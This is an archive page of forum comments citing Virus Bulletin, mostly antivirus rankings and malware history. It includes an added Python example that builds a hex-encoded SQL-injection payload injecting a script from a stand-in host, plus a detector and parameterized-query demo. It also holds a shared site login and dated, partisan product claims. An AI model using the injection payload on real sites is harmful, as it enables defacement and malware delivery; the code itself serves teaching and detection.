Domain: virusbtn.com
Stories and comments across the archive that link to virusbtn.com.
-
Re:rootkit?
I think the reason reverse engineering is forbidden is because of Intel's new DRM scheme:
https://www.virusbtn.com/virus...
Which by the way, among other things, this new DRM scheme would also allow malware to completely hide itself from not only AV software, but you as well. And in a perfect world (i.e. if SGX works as intel plans) nobody would be able to remove any malware that uses this.
-
Re: Clickbait
The bypass allows a network-level remote attacker to inject executable code (a dylib) into a legitimate download (.dmg/.zip) without it being detected. When the user goes to run their download - the injected unsigned code is then also executed. IMHO Gatekeeper should block that - so yeah, it's a Gatekeeper bypass not a remote code execution vulnerability. The RSA slides are somewhat short on details ([PDF] https://s3.amazonaws.com/s3.sy...) - for full technical details see: [PDF] https://www.virusbtn.com/pdf/m... (page 15+ describes the Gatekeeper bypass).
-
MSE and Defender are not good choices.
There's a lot of people saying Microsoft Security Essentials or Windows Defender. That was a great answer a few years ago, it's not now. It's near the bottom of the lists in rankings on most tests. For those saying don't use any AV, stop posting please. You're not impressing anyone by trying to be l33t prosauce internet surfer. http://www.av-comparatives.org... http://www.av-test.org/en/anti... https://www.virusbtn.com/vb100... http://www.tomsguide.com/us/be... http://www.lifehacker.co.uk/20... Nowhere on any of those links will you find someone saying that MSE/Defender is a good choice.
-
Re:Read here for a more detailed perspective
Hello,
The first public analysis of the malware campaign (called BlackEnergy by most researchers) was done by Arbor Networks back in October 2007, and Dell SecureWorks did a comprehensive write-up on its second generation in 2010. Additional information on this malware campaign:
- We Live Security blog - Back in BlackEnergy: 2014 Targeted Attacks in Ukraine and Poland
- 2014 Virus Bulletin Conference - Last-minute paper: Back in BlackEnergy: 2014 targeted attacks in the Ukraine and Poland and YouTube video of the presentation
- We Live Security blog - CVE-2014-4114: Details on August BlackEnergy PowerPoint Campaigns
- Virus Radar - description of Win32/Rootkit.BlackEnergy.AA
Hope this information is useful to anyone who might be concerned they have compromised hosts on their network.
Regards,
Aryeh Goretsky -
Re:Not implausible
There is no way for anybody outside of Google to know whether the original claim is correct or not.
That's not quite true actually. VirusBulletin is a third party spam filtering company that made a blog post stating that based on their own measurements, Gmail was indeed dramatically better at stopping hijackings than other providers.
-
Too many colors in syntax highlighting
The code snippets have too many colors which in my opinion make them hard to read. What do you think?
-
Why the Antivirus Era Is Over
They can't keep up with the known threats
Comparative reviews since February 2009 - February 2014
Out-maneuvered by new threat vectors
Outmaneuvered at Their Own Game, Antivirus Makers Struggle to Adapt
Some of them even get it, Eugene Kaspersky admits :
-
Re:Microsoft Security Essentials
MSE does have a lightweight footprint, but it's almost the worst AV you can choose for real virus protection.
http://www.virusbtn.com/vb100/RAP/RAP-quadrant-Oct12-Apr13-12.jpg
There is a chart of recent AV comparative effectiveness tests done by independent labs. Microsoft scored somewhere around 75% effectiveness for "Proactive" (real-time) protection. The best one on that chart for free appears to be Avira.
-
Virus Bulletin comparison chart
Here's a link to Virus Bulletin for a comparison of free and paid packages. I'd also recommend a multi-tiered strategy of OpenDNS and a hosts file to block bad sites, MalwareBytes to scan and check for malware (paid version provides real-time protection), and I also use Tracking Protection Lists. Takes all the joy out of it, doesn't it.
-
Re:best antivirus / firewall for Windows? Linux?
The original Windows Security Essentials was a well regarded AV program, but 2.0 has a very low detection rate and shouldn't be used.
Virus Bulletin rates programs by platform and has a top 100. I was surprised that a free version (Avira) is one of the best.
-
Re:We Got Hit By This
Here is a great overview of the technique that was used:
http://www.virusbtn.com/pdf/conference_slides/2009/Maciejak-Lovet-VB2009.pdf
While they are targeting IIS and MSSQL the real issue is developers that don't sanitize the parameters that get sent to the database. The SQL is encoded in at least 2 different layers, so the only keywords that appear in the URL are
;dEcLaRe%20@s%20vArChAr(8000) and ;EXEC%20(@S); and it would be pretty difficult for Microsoft to block those without affecting legitimate usage. If you are using LINQ, Stored Procedures, or Parameterized Queries based on SqlCommand then this wouldn't work against your site or library. Mainly queries created as raw text strings have this vulnerability, and in this case it appears that some library or module used by a number of sites used raw SQL strings instead of the best practices recommended by Microsoft and every other SQL and web server vendor. -
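The comment above describes the two-layer encoding (a hex literal inside a CAST, then percent-encoding in the URL) and why raw string SQL falls to it while parameterized queries do not. The following is an added example, written for this page and not code from the thread or from the linked VB2009 paper: it reconstructs the hidden statement from the query string, runs that decoder over a few constructed IIS log lines, and then contrasts a string-built lookup with a parameterized one on SQLite. The inner statement, host names, log lines and table are all constructed; SQLite has no DECLARE/EXEC, so the stacked statement used in the database part is the SQLite-shaped equivalent of the T-SQL attack.

```python
"""Layered SQL-injection payload: decode it from a web log, then show why
string-built SQL is vulnerable and a parameterized query is not.
Added example; payload, log lines and table are constructed."""
import re
import sqlite3
from typing import List, Optional, Tuple
from urllib.parse import quote, unquote

# Hypothetical inner statement; the real campaign's payload is not reproduced.
INNER_SQL = ("UPDATE products SET description = description + "
             "'<script src=\"http://example.invalid/x.js\"></script>'")


def build_attack_param(inner_sql: str) -> str:
    """Layer 1: hex-encode the statement inside CAST(0x.. AS VARCHAR) so no
    quotes or keywords of the real statement appear.  Layer 2: percent-encode
    for the query string.  Mixed-case DECLARE dodges naive filters."""
    hexed = inner_sql.encode("ascii").hex().upper()
    tsql = (";dEcLaRe @s vArChAr(8000);SET @s=CAST(0x" + hexed +
            " AS VARCHAR(8000));EXEC (@s);--")
    return quote(tsql, safe=";@()=-")


# Stacked DECLARE of a (n)(var)char variable right after a statement terminator.
STACKED_DECLARE = re.compile(
    r";\s*declare\s+@\w+\s+n?(?:var)?char\s*\(\s*\d+\s*\)", re.I)
# The hex literal that carries the hidden statement.
HEX_CAST = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?(?:var)?char", re.I)


def extract_inner_sql(query_string: str) -> Optional[str]:
    """Hidden statement if the DECLARE/CAST/EXEC pattern is present, the
    decoded query string if only the DECLARE is, None for a benign request."""
    decoded = unquote(query_string)
    if not STACKED_DECLARE.search(decoded):
        return None
    m = HEX_CAST.search(decoded)
    if m is None or len(m.group(1)) % 2:
        return decoded
    return bytes.fromhex(m.group(1)).decode("ascii", "replace")


def scan_iis_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(client ip, uri stem, recovered statement) per suspicious W3C log line."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 9:
            continue
        stem, query, client_ip = fields[4], fields[5], fields[8]
        inner = extract_inner_sql(query)
        if inner is not None:
            hits.append((client_ip, stem, inner))
    return hits


# Constructed log lines in IIS W3C field order (see the #Fields header).
LOG_LINES = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip cs(User-Agent) sc-status",
    "2009-05-04 12:00:01 10.0.0.5 GET /product.asp id=42 80 - 198.51.100.7 "
    "Mozilla/4.0 200",
    "2009-05-04 12:00:02 10.0.0.5 GET /product.asp id=42"
    + build_attack_param(INNER_SQL) + " 80 - 203.0.113.9 Mozilla/4.0 200",
]

# SQLite-shaped equivalent of the stacked attack: a second statement riding
# on the same parameter (SQLite has no DECLARE/EXEC).
STACKED_SQLITE = "42; UPDATE products SET description = description || '<script>'"


def _fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, description TEXT)")
    conn.execute("INSERT INTO products VALUES (42, 'widget')")
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, product_id: str) -> Optional[str]:
    """Raw concatenation through a batch-capable execute path (executescript
    here; an ADO command on SQL Server behaves the same): the attacker's
    second statement runs with the application's database rights."""
    conn.executescript("SELECT description FROM products WHERE id = " + product_id)
    row = conn.execute("SELECT description FROM products WHERE id = 42").fetchone()
    return row[0] if row else None


def safe_lookup(conn: sqlite3.Connection, product_id: str) -> Optional[str]:
    """Parameterized query: the value is bound as data, never parsed as SQL."""
    row = conn.execute("SELECT description FROM products WHERE id = ?",
                       (product_id,)).fetchone()
    return row[0] if row else None


def run_demo() -> dict:
    return {
        "vulnerable": vulnerable_lookup(_fresh_db(), STACKED_SQLITE),  # defaced row
        "safe_injected": safe_lookup(_fresh_db(), STACKED_SQLITE),     # no row, no change
        "safe_normal": safe_lookup(_fresh_db(), "42"),                 # 'widget'
    }


if __name__ == "__main__":
    for client_ip, stem, inner in scan_iis_log(LOG_LINES):
        print(f"{client_ip} -> {stem}: {inner}")
    print(run_demo())
```

The decoder keys on the stacked `;DECLARE @x VARCHAR(n)` shape rather than on the keyword alone, which is what makes it usable on IIS logs without flagging every legitimate request that happens to contain the word; the hex layer is then unwrapped so the analyst sees the actual statement the site executed.
-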
Re:Double ouch.
And according to Virus Bulletin, they're one of the worst for proactive detection and about average for reactive detection.
It's never good to only use a single source for these things.
-
Re:i stopped using avast because of popups
is there a way to evaluate antivirus software? i mean, after it's 1.) no popups, 2.) not bloaty 3.) easy on the system 4.) convenient to use... how do you know if it actually works?
There are sites that test AV products, two are:
Virus Bulletin and AV-Comparatives.
These can be used to get an idea of the effectiveness of the product. As for 1, 2, 3 and 4 just trying the product will tell you about it. If one of those issues causes problems, discard the AV product and get another, this goes especially for the "easy on the system" requirement.
-
I check the scores on Virus Bulletin and...
I check the scores on Virus Bulletin http://www.virusbtn.com/vb100/archive/results?display=summary and AV Comparatives http://www.av-comparatives.org/images/stories/test/summary/summary2009.pdf to get the best available. I have used Avast! for years with great success, and recently started using Microsoft Security Essentials, both of which are VB100 rated. I like the small footprint of the new MS offering, and the fact that it has such a high detection and low false-positive rating. So far so good, even on my in-laws' laptop.
-
Already being tested by Symantec
Hello,
What Dr. Jakobsson has described is a reputation system.
At Virus Bulletin 2009, Symantec gave a presentation on reputation systems: " Using the wisdom of crowds to address the malware long tail ," which cited data from one that began development in 2006. While I do not claim to understand the system, in a nutshell, it seems to work by generating a hash for files after they are downloaded or when they are to be executed, and sends this to Symantec along with some metadata, such as source IP/host, filename, path specification on the local host, date and time stamp on the file and other useful information, which is sent to Symantec, initially to provide a quick lookup, but more information can be sent if additional analysis is required. Symantec's client software can then display a message saying "Program XYZ.EXE has been seen n time(s) over the course of n day(s)/week(s)/month(s)." along with some suggestions about how safe it is likely to be based on new/unique program files more likely to be untrusted (higher potential for malcode) and older, commonly program files having a higher degree of trust.
One advantage of this approach is that it allows malicious files encoded using server-side polymorphism to be quickly identified, as well as the sites hosting them. This negates the technique used by the bad guys of constantly modifying code in order to escape detection by anti-virus software.
Regards,
Aryeh Goretsky -
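The reputation system sketched in the comment above (hash plus metadata submitted at download or execution time, a prevalence lookup, and trust that grows with age and spread) is easy to prototype. The block below is an added example written for this page, not Symantec's code; every host name, submission record and threshold in it is constructed. It goes one step beyond the per-file counter the comment mentions by also scoring the serving host: a host whose downloads are nearly all never-before-seen hashes is behaving like a server-side polymorphic distribution point, and that taints every fresh hash it serves, which is how such a backend can flag the site as well as the files.

```python
"""Toy file-reputation backend: per-hash prevalence and age plus a
per-host "every download is a new binary" signal.  Added example with
constructed data, not any vendor's implementation."""
import hashlib
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, Set

DAY = 86_400


@dataclass
class HashStats:
    first_seen: int
    last_seen: int
    count: int = 0
    hosts: Set[str] = field(default_factory=set)


class ReputationService:
    def __init__(self, trusted_min_count: int = 1000, trusted_min_age_days: int = 30,
                 poly_min_distinct: int = 20, poly_min_ratio: float = 0.9):
        self.by_hash: Dict[str, HashStats] = {}
        self.host_hashes: Dict[str, Set[str]] = defaultdict(set)
        self.host_downloads: Dict[str, int] = defaultdict(int)
        self.trusted_min_count = trusted_min_count
        self.trusted_min_age = trusted_min_age_days * DAY
        self.poly_min_distinct = poly_min_distinct
        self.poly_min_ratio = poly_min_ratio

    def submit(self, content: bytes, source_host: str, ts: int) -> str:
        """Client-side step: hash the file and report the hash with metadata
        (here just the source host and timestamp)."""
        h = hashlib.sha256(content).hexdigest()
        st = self.by_hash.setdefault(h, HashStats(first_seen=ts, last_seen=ts))
        st.count += 1
        st.last_seen = max(st.last_seen, ts)
        st.hosts.add(source_host)
        self.host_hashes[source_host].add(h)
        self.host_downloads[source_host] += 1
        return h

    def host_is_polymorphic(self, host: str) -> bool:
        """Many downloads, almost every one a distinct hash."""
        distinct = len(self.host_hashes[host])
        downloads = self.host_downloads[host]
        return (distinct >= self.poly_min_distinct
                and distinct / downloads >= self.poly_min_ratio)

    def verdict(self, h: str, now: int) -> str:
        st = self.by_hash.get(h)
        if st is None:
            return "unknown"
        if any(self.host_is_polymorphic(x) for x in st.hosts):
            return "suspicious-polymorphic"
        if st.count >= self.trusted_min_count and now - st.first_seen >= self.trusted_min_age:
            return "trusted"
        if st.count == 1:
            return "unknown-rare"
        return "unproven"


def build_scenario():
    """Constructed traffic: one widely downloaded installer, one host that
    hands out a fresh build per download, one single-download niche tool."""
    svc = ReputationService()
    hashes = {}
    installer = b"MZ...well-known installer bytes (constructed)"
    for i in range(1500):                       # 1500 downloads spread over 60 days
        hashes["trusted"] = svc.submit(installer, "updates.example.com", i * 60 * DAY // 1500)
    for i in range(30):                         # every download is a new binary
        blob = b"MZ...dropper (constructed) " + i.to_bytes(4, "big")
        hashes["poly"] = svc.submit(blob, "cdn.bad.example", 59 * DAY + i * 60)
    hashes["rare"] = svc.submit(b"MZ...niche tool (constructed)",
                                "ftp.smallvendor.example", 60 * DAY)
    return svc, hashes


if __name__ == "__main__":
    svc, hashes = build_scenario()
    for label, h in hashes.items():
        print(label, svc.verdict(h, now=61 * DAY))
```

The design choice worth noting is that "unknown-rare" is not "malicious": a legitimate one-off tool from a small vendor looks exactly like a single polymorphic sample on its own, so the host-level ratio is what separates the two, and a client should present the rare case as "seen 1 time" advice rather than a block.
-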
Re:Symantec is saying this?
Virus Bulletin unbiased enough?
Dunno if they have a more recent test, that's the one I had bookmarked. I get about the same results in my tests, btw.
-
Virus Bulletin
Don't see anything from the VB100 list yet. http://www.virusbtn.com/index
-
Re:Can't Pay Me
According to a (not so terribly old) VirusBulletin comparison, Avira seems to be the company du jour.
-
Re:Yay
The crackers themselves are generally cool, I will agree, but there are some corners of the Internets that can get your PC in some seriously obnoxious shit if you aren't careful.
For example, you can read about this bit of nasty code that's distributed through image links on Warez sites. (I believe a free, painless registration is required to read the full article)
Basically, PC gaming is so massively unappealing at this point to me not because I need the latest hardware or to fiddle with drivers, but because I can't stand the copy protection on retail (packaged) games and what they might be doing to my PC, I can't tolerate Steam and its reliance on servers I may or may not have access to when I want to play, or cracked games, with the disturbing implications for PC security that come from non-official packages. Those three things don't leave me with a whole lot of options, especially since I hate console game control systems.
-
Re:Rootkit? Nice timing
I fucking just LOVE it when people post "information" which is not backed up by any source or link or anything.
http://www.virusbtn.com/news/2008/09_02
Here are the latest results I could find. Note that AVG is NOT the worst by far. The free version only suffers in its lack of detection for malware but the GP did not say that the free version was installed. Now Avira comes out smelling like a rose in these tests so of course they are recommended but AVG is also very good. -
Re:Because you don't need more cycles in biz
Unfortunately I may not make recommendations. But McA is about the worst when it comes to resource hogging.
What I may do is link to test pages. Take a look at http://www.virusbtn.com/news/2008/09_02 and act accordingly.
;) -
My antivirus research for my IT department
We use Kaspersky for Windows systems at work (and ClamAV on Linux for mail, though that might change to Kaspersky as I believe we have a license for it). When employees ask if they can use our licenses for their personal machines, I point them at Avira AntiVir because it's about as good and it's FREE FOR PERSONAL USE (although the free version has less spyware detection). It blows AVG out of the water.
Here are some useful links from my research, which included the above site:
- Wikipedia:Antivirus software's external links are very useful.
- Top 9 Windows Antivirus, a review at About.com, ranking Avira, Kaspersky, BitDefender, and McAfee as #1, 2, 3, and 4 respectively.
- Virus.gr measured detection rates of tweaked settings, ranking in order: G DATA, F-Secure, TrustPort, then Kaspersky.
- AntiVirus Software Review 2009 - TopTenREVIEWS, ranking in order: BitDefender, Kaspersky, ESET, then AVG.
- Virus Bulletin's latest test results (no direct ranking).
From the Wikipedia links and other research that I didn't bother to note to my colleagues (who were also doing this research), I determined that Kaspersky's software was among the most efficient and CPU-friendly. Its only downside was a less-than-optimal user interface, especially on the administrative side for the corporate product. We didn't mind its UI flaws in the free trial period, so we purchased it. We're still happy with it several months later.
The main arguments for our switching from Trend Micro were that it was slow, had poor performance, missed several viruses, we wanted to boycott it, and we were tied to a very old version (since it out-performs the newer ones in reviews). Arguments for switching to Kaspersky included: it doesn't feel bloated (remember when that was the norm?), great performance, well received across the board in reviews, dirt cheap (new licenses are 70% the current renewal cost of Trend Micro, which is an ever-growing target), we liked the UI that prevented reviewers from giving it a perfect score, and it's the de-facto number one scanner in Russia and surrounding area (you know, where all the viruses come from?). Kaspersky is also growing rapidly in deployments; you can now get computers installed with it.
-
Check http://www.av-test.org/
You can check some of the ones listed at http://www.virusbtn.com/news/2008/09_02, which also qualifies them a bit!
I personally use Avira AntiVir and like it! I started with the free edition but quickly upgraded, it's pretty cheap and might as well support them...
-
Re:Any suggestions for non-free programs?
So supposing money isn't an issue, what do you recommend?
Not the "usual suspects" (McAfee and Symantec), they're resource hogs. I used F-Prot for years and found it to be resource-light and good at detection but not always at removal. I find NOD32 a PITA to install on client machines but haven't used it extensively myself (and probably wouldn't, just because it's so obnoxious to install). I really liked AVG before 8.0, though I had stopped using it because once every few weeks it would break doing an update, and the only way to make it work again was to uninstall and reinstall it (haven't noticed anyone else having that problem, so it's probably unique to my particular configuration).
At the moment, I rather like Avira, and it scored very well in recent AV-test.org tests. (For whatever credence one gives such tests, the rankings ebb and flow from quarter to quarter.) But pay or free, IMHO the main things are that the program doesn't bog the machine down (especially important if you, like me, tend to run less than state-of-the-art hardware), and that the user interface not be too annoying. Most of the programs are adequate at stopping viruses, so it's not that big a deal which one you use so long as it updates regularly.
-
Re:How bad will i get flamed for this?
Not really; sites such as av-test.org and virus.gr are constantly testing malware detection, and while coverage is spotty on average, the products do tend to keep pace with new malware.
-
Re:Just some more...
What good points? It has a resource intensive "shiny" interface. It has levels of DRM heretofore unseen in an operating system. It is claimed that it is secure, yet still has gaping security holes. It is claimed that it is safe, yet has to be made un-safe for users to be able to do anything with it. It is expensive, clunky, space consuming, privacy invading, insecure, unsafe, and is more interested in protecting the interests of major Hollywood distributors than its users.
Care to highlight why I'd want to use Vista? -
Re:A very good excuse...
Hello,
I think it is a bit disingenuous to say that the reason some of the tested programs failed to receive a VB100 award had anything to do with changes to the test procedures used by Virus Bulletin Magazine. The tests consist of ItW (In The Wild), macro, polymorphic, file infector virus "zoos," with ItW and macro tests being repeated for both scheduled on-demand scanning and on-access (file I/O wedge) scanning, plus a set of clean files which are used to test for false positives. You can view information about the test sets here on Virus Bulletin's web site.
The tests performed are basically those of detection (or lack of detection in the case of the false positive set—remember, a false positive report can be just as damaging to productivity in a corporate environment as an actual viral outbreak), along with some sometimes-snarky comments about the program being tested (usually related to usability issues). The VB100 award means that a product passed the ItW and false positive tests; it could still have fared poorly on the other tests and received the award.
The idea that you can somehow "optimize" a product for these tests is a bit silly; ItW viruses are the ones which affect a vendor's customers and their technical support department receive calls about all day. The idea that a vendor was somehow not concentrating their detection efforts on these is ludicrous; the ability to handle these types of threats is how they generate their revenue. As for avoiding a false-positive report against a clean set, well, I cannot think of a practical way to engineer a virus scanning engine's signature database for that.
Computer Associates and Symantec received VB100 awards in this test and they are enterprise vendors, so claiming that the "major vendors missed it" this time around is incorrect. Conversely, vendors which specialize in anti-malware like Norman did not receive a VB100 award this time around. While there may be some correlation between the size of a vendor and their detection rate, I do not know if it is as linear a mapping as you imagine.
Regards,
Aryeh Goretsky -
This is just one review...
Hello,
I shared my thoughts on this over here on Neowin.Net's forums, so I really don't just want to do a cut-and-paste job and post what I wrote in verbatim here.
This is one of the first of a series of comparisons to include Microsoft Windows Live OneCare that Virus Bulletin Magazine has been doing for many years. While I suspect it is more frustrating than embarrassing at this point for the team responsible for Microsoft's Windows Live OneCare, this is really Microsoft's first attempt at providing their own comprehensive anti-malware solution—MSAV, the product which shipped with DOS does not count, it was licensed from Central Point Software (who was later acquired by Symantec) who, in turn, had licensed the software from Carmel Software—and it is going to take some time and lots of signature release cycles in order to get their detection rate fine-tuned.
I don't expect this first Virus Bulletin product comparison to be the last, and the question really isn't how Microsoft did this time: It is how their product does over the next year or two that matters. If it gets worse or stays the same, they are just another competitor in the space (albeit the one with the deepest products). If, however, their detection rate improves, it is going to make it just that much more difficult for their competitors to compete against them.
As a disclaimer of sorts, I should mention that I happen to work for one of the computer security companies that Microsoft competes against with this product, so this discussion is far from academic for me. Frankly, though, I'm not expecting Microsoft's entry into this space to have any effect on my employer—we are good at what we do and have a very loyal customer base. Also, we tend to compete against other, similarly-sized companies in the field. What I do worry about, though, is how some of my friends and colleagues at the largest companies are going to handle Microsoft's entrance as they are going to be competing head-to-head against Microsoft for marketshare.
Regards,
Aryeh Goretsky -
Re:Look at the Price!
At the end of the day, until we all stop using the same operating system, we're doomed to a continual barrage of large-scale infections (remember the Irish potato famine?)
Actually, Dr. Ford, a professor at Florida Institute of Technology, did some research into this. In order to have enough diversity to make a dent in it, we would need some ungodly number of different operating systems. You can read about it in the December 2003 issue of Virus Bulletin. It's in PDF format, and you have to do a free registration, but you can find the article in the archives.
Also note that Windows is a primary target because of its large install base. If we all switched to Linux, or MacOS, we'd still have problems, it would just be targeted at our new OS. As someone else mentioned, it all comes down to the user wanting to do what they want to do with their own machine. -
Re:What problem?
AVG may run fast, but I've found that its not quite as good as other (non-free) products at catching viruses
Virus Bulletin (BugMeNot Required) does tests of about 30 different antivirus programmes on various versions of windows from NT4 to Server 2003.
They set up computers with the various AV software, and infect the computers with currently common viruses and see which ones catch them. The results of 44 of these tests since 1998 for some of the major AV programmes are as follows;
Passed/Failed/NA
Symantec 30/7/7
McAfee 24/18/2
F-Secure 21/12/11
AVG 11/21/12
and the one that I used to use when I ran windows (partly as a result of these tests)
Eset passed 36, failed 3, 5 N/A
AVG is improving, but it still fails these tests periodically. A few years ago, I would have called recommending AVG downright irresponsible, it had only passed 1 out of 20 tests by Feb 2003 -
Re:AVG
You should really check out Eset's Nod32 http://www.nod32.com/home/home.htm and their success rate on Virus Bulletin (the de-facto standard in AV testing) http://www.virusbtn.com/vb100/archive/results?vendor=VE14
login&passwd: lazyboy05 (from bugmenot.com)
for a quick summary of VB 100% results for "major" AV vendors:
Eset (nod32): 36 Success / 3 Failure / 5 No Entry
Symantec: 30 Success / 7 Failure / 7 No Entry
Trend Micro: 13 Success / 7 Failure / 24 No Entry
Kaspersky: 31 Success / 13 Failure / 0 No Entry
McAfee: 24 Success / 18 Failure / 2 No Entry
Panda: 1 Success / 3 Failure / 40 No Entry
Alwil (Avast): 16 Success / 19 Failure / 9 No Entry
Grisoft(AVG): 11 Success / 21 Failure / 12 No Entry
F-secure: 21 Success / 12 Failure / 11 No Entry
Sophos: 31 Success / 12 Failure / 1 No Entry
Nod32 not only has the best detection engine, it's the fastest AV too! ..sorry if I'm too excited about this particular product, but it just wipes the floor with "the best" you've found. ..and all the other competition :)) -
VGrep
Isn't this exactly what VGrep was designed to sort out?
-
Re:CARO?
Yes, I wondered about that as well. The CARO system has worked well for a long time now, and there have been a number of initiatives to regularise the virus naming taxonomy - I remember Jim Bates coming up with one in the 80s, which was all numeric!
The problem is that the researcher working on a virus has to name it very rapidly. Viruses are often variants of others, so you need expertise in name allocation - it can only be done by the researchers. I would have thought that the CARO system had sorted out all the bugs by now. Perhaps the US Cert are just tagging on the coat tails of CARO?
Incidentally, for anyone who wants to translate virus names from one product to another, the industry tool of choice is VGREP, which can be found here - http://www.virusbtn.com/news/vb_news/2005/02_10.xml -
Re:Antivirus is basically bunkum
We are born with an immune-system. Computers are born with the equivalent to AIDS: Immune Deficiency Syndrome, but in their case it is ABSOLUTE Immune Deficiency Syndrome.
And there are a couple of gotchas in the parent's cosmology, it seems:
One doesn't know if one's system is infected just because one hasn't connected to the 'net "raw". . . ( if you want to "know" something, test it correctly )
Firewalls are circumventable ( i.e. have bugs, and such are exploited ).
Software is sometimes accidentally distributed already-infected ( Microsoft did it with one of their CDs, manufactured in an infected factory, IIRC ).
Using recordable media means ( if one exchanges information between systems, or between infected previous-install and current not-yet-infected install, for instance ) risk. .
.Etc.
And. . . Trusted Computing can also pertain to INDEPENDENT, INTEGRITY-DRIVEN comparative-reviews, eh?
Virus Bulletin used-to-have visible to anyone archives ( I think they changed that, some time ago ), and back-a-year-or-two ago it was Eset & Vet ( http://www.nod32.com/ and http://www.vet.com.au/ ) who were the ones to beat. Vet won if simplicity was a factor, as Eset apparently has one gazillion config microsettings
( and also, it wasn't possible to buy Eset online if one was running Linux, last time I tried: one HAD to be using MS-Windoze + MS Browser to buy it, but they apparently contracted-out their net-purchase-system, so it wasn't Eset that did that, it was whomever their contractor-company was that enforced a non-secure system to purchase Eset ). Anyways. . Oh! they've boshed privacy entirely! now one MUST register/login to view the awards at all, eh?
Ah well, they USED to offer good independent information to us, anyways. .
.
Here's the only page it seems they allow anonymous reading of:
http://www.virusbtn.com/magazine/this_month/index.xml
if you've a throwaway e-mail address, maybe you can see if they're worth anything nowadays, on their "100% Award", which is an award given to all AV progs that defeat 100% of all the in the wild viruses they sic on 'em. .
. -
Re:Why not Grisoft AVG?
I've had good success with the latest AVG and having it installed for clients. No outbreaks to speak of and it's free to boot. AVG also passed the latest https://www.virusbtn.com/ test with 100% detection.
I used to use Avast but IMHO just gotten to the point where its too bloated. Scan every file accessed or downloaded and my email. Don't hook into every nook and cranny of my OS. Avast IMHO does a good job, its just way heavy on resources.
Either way both Avast and AVG are still better than norton which unfortunately can be found everywhere with of course a virus subscription that expired in June 2004. Sigh. -
How is this different from *NIX shell scripts?
How is this different than writing a ksh or bash script virus? Ksh and bash script viruses can be just as bad. Heck, remember the Morris worm?
I like bashing M$ just as much as the next ./er, but this might not be their bad just yet. -
Re:symantec/norton are utter crap
Actually I found NOD32 thru the Virus Bulletin. Maybe YOU should go check Virus Bulletin, as far as I can tell they look about the same. So yeah, I'll take the one that doesn't bog my system down. Come back when you have some facts troll.
http://www.virusbtn.com/vb100/archives/products.xml?eset.xml
http://www.virusbtn.com/vb100/archives/products.xml?symantec.xml -
The case of the AIDS information disk
Back in 1989, an individual sent out a mass mailing to many recipients. The mailing consisted of an envelope including a floppy disk and a license agreement in small print. The software on the disk provided an assessment about the user's risk regarding HIV/AIDS. (Supposedly, users were encouraged to install and run the software.) However, the software also contained a hidden mechanism. After a delay, the mechanism would encrypt and hide files on the user's system. The license agreement specified a license fee ($189 one-off or a $378 "lifetime license") for using the software. This payment was to be sent to a PO box in Panama for "PC Cyborg Corporation." In addition, the license agreement warned of "most serious consequences" for failure to pay the license fee. A file left by the software said that users who paid would receive a "renewal software package." The originator of the software was tracked down but was found unfit to stand trial. (See the "Virus: AIDS Diskette" entry on this page.)
-
Disk-Jacking to put hard drives At Your Disservice
There's a larger risk looming in this unwelcome feature... From an earlier submission:
Heise has just released a dire warning (and temporary treatment) from c't regarding ATA hard disk security passwords: There may be a gaping security hole in millions of computers that allows malware to lock the hard drives from their legitimate users. Some will remember what this means from extortionate trojan horses as early as 1989 (search for "Panama" - judicial outcome in 1995). Now factor in how some similar disaster, "supported" by firmware, could spread over the Internet rather than by postal mail today...
It seems crucial to protect one's system ASAP against what could become a boon for blackmailers.
The problem is that if BIOS doesn't disable the function, a "well"-(i.e. viciously)-positioned malware (early in the boot process) could lock the hard drive on first reboot even before any protective software can kick in. -
Some Googling about R. Ford suggests MS paid him
No offense. But it sounds like people are searching for things to dismiss this study.
It is more than right to check the validity of the study. And some googling suggests that Robert Ford dilapidates his scientific reputation for money. Being a self proclaimed Linux enthusiast there is little evidence to be found for that. But he closely works together with Microsoft:
From: http://www.virusbtn.com/conference/vb2004/programme/
Gatekeeper II: new approaches to generic virus prevention Richard Ford, Florida Institute of Technology Matt Wagner, Microsoft Corporation Jason Michalske, Florida Institute of Technology
Doing talks together with Microsoft employees is certainly not a sign for his independence and Linux attachment.
IMHO he should immediately be expelled from the Florida Institute of Technology.
-
Integrity?
Well, apparently this is the second time Microsoft has come out on top of a research project by Mr. Richard Ford.
http://www.virusbtn.com/magazine/articles/letters/2004/01_01.xml
Apparently there was some question to the validity of an earlier project because it was sponsored by Microsoft.
However, I would like to note that both researchers seem very well educated, especially in computer security. And, additionally, they both note that a lot more could be done to lock down the Linux server.
-
Helpful Articles On Virus Scanner Selection
Here are some helpful resources on Virus Scanner tests if you can't decide which one to use:
http://www.virusbtn.com/vb100/archives/products.xml?
http://www.pcworld.com/reviews/article/0,aid,115939,pg,5,00.asp -
Re:Wouldn't it be better?
As I've stated before, whatever OS is the dominant one, is the one that virus writers will explore and find the exploits for. Already Symantec has ported to the Mac platform because of the growth it's realized lately. Virus writers are now beginning to attack it, (although not as much as Windows.)
And already the OSS community has been attacked by spyware. If this vulnerability, done by a JavaScript, can affect Firefox on Unix, then any browser can be compromised.
Now, that said, I do believe that MS should not be charging for this software, but if they made one for free then the competition would thin out quite quickly. And a search of Virus Bulletin shows nothing on this company participating in any of their tests.
So, how good can it be? -
Paper by Vesselin Bontchev
The definitive (and about ten-year-old) paper on this is:
http://www.virusbtn.com/old/OtherPapers/GoodVir/
Well worth a read if you've not seen it before -
Re:Too many patches
I remember looking for a replacement AV solution earlier this year. One of the products (NOT Norton) claimed to have this kind of predictive ability - detecting viruses not through signatures but by analysis. I think it was Kaspersky, but I'm not sure. (In the end, I decided to put off my decision.) I was looking at the AV products listed on Virus Bulletin, in case you want to find out which one it was.
-
Re:It's another case against OS monoculture
You can read a good rebuttal against the 'MONOCULTURE IS DEATH' argument here:
http://www.virusbtn.com/magazine/archives/200312/monoculture.xml
written by someone who actually knows a little about malicious mobile code :-) -
Re:Too bad...
A really good troll makes every word in his sentence a link so that his point seems valid.
You don't even have to visit the sites, just google something like "linux vs windows", grab relevant links and include them in your post. No one will read them anyways, and believe you because you provided plenty of background Info and reputable sources (computing.net included!). They will have to believe your Pro-Windows rant.
